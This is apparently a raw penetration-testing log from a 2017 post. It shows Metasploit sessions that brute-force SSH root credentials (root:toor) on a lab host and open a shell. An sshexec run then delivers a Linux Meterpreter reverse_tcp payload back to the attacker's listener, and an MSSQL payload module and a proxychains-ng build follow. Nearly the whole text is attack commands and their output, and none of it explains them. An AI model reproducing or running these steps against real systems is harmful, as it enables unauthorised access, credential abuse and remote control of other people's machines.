msf exploit(sshexec) > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > show options

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   true             no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      true             no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(ssh_login) > set RHOSTS 192.168.1.104
RHOSTS => 192.168.1.104
msf auxiliary(ssh_login) > set USERNAME root
USERNAME => root
msf auxiliary(ssh_login) > set PASS
set PASSWORD   set PASS_FILE
msf auxiliary(ssh_login) > set PASSWORD toor
PASSWORD => toor
msf auxiliary(ssh_login) > exploit
[*] 192.168.1.104:22 SSH - Starting bruteforce
[*] 192.168.1.104:22 SSH - [1/3] - Trying: username: 'root' with password: ''
[-] 192.168.1.104:22 SSH - [1/3] - Failed: 'root' : ''
[*] 192.168.1.104:22 SSH - [2/3] - Trying: username: 'root' with password: 'root'
[-] 192.168.1.104:22 SSH - [2/3] - Failed: 'root' : 'root'
[*] 192.168.1.104:22 SSH - [3/3] - Trying: username: 'root' with password: 'toor'
[*] Command shell session 4 opened (192.168.1.105:54562 -> 192.168.1.104:22) at 2014-08-07 22:55:54 +0800
[+] 192.168.1.104:22 SSH - [3/3] - Success: 'root' : 'toor' 'uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:SystemLow-SystemHigh Linux localhost.localdomain 2.6.18-164.el5 #1 SMP Thu Sep 3 03:33:56 EDT 2009 i686 i686 i386 GNU/Linux '
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > sessions

Active sessions
===============

  Id  Type         Information                       Connection
  --  ----         -----------                       ----------
  4   shell linux  SSH root:toor (192.168.1.104:22)  192.168.1.105:54562 -> 192.168.1.104:22 (192.168.1.104)

msf auxiliary(ssh_login) >

msf> use exploit/multi/ssh/sshexec
msf exploit(sshexec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(sshexec) > set LHOST 192.168.1.105
LHOST => 192.168.1.105
msf exploit(sshexec) > set LPORT 8080
LPORT => 8080
msf exploit(sshexec) > set RHOST 192.168.1.104
RHOST => 192.168.1.104
msf exploit(sshexec) > set PASSWORD toor
PASSWORD => toor
msf exploit(sshexec) > exploit
[*] Started reverse handler on 192.168.1.105:8080
[*] 192.168.1.104:22 - Sending Bourne stager...
[*] Command Stager progress - 40.39% done (288/713 bytes)
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1228800 bytes) to 192.168.1.104
[*] Command Stager progress - 100.00% done (713/713 bytes)
[*] Meterpreter session 3 opened (192.168.1.105:8080 -> 192.168.1.104:40813) at 2014-08-07 22:53:12 +0800
meterpreter >

msf exploit(psexec) > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > show options

Module options (exploit/windows/mssql/mssql_payload):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   METHOD               cmd              yes       Which payload delivery method to use (ps, cmd, or old)
   PASSWORD                              no        The password for the specified username
   RHOST                                 yes       The target address
   RPORT                1433             yes       The target port
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(mssql_payload) >

root@kali:~# git clone https://github.com/rofl0r/proxychains-ng.git
正克隆到 'proxychains-ng' ...
remote: Counting objects: 842, done.
remote: Total 842 (delta 0), reused 0 (delta 0)
Receiving objects: 100% (842/842), 465.92 KiB | 27 KiB/s, done.
Resolving deltas: 100% (554/554), done.
root@kali:~# cd proxychains-ng/
root@kali:~/proxychains-ng# ./configure --prefix=/usr --sysconfdir=/etc
Done, now run make && make install
root@kali:~/proxychains-ng# make && make install

Posted: 2017-11-02 09:49:49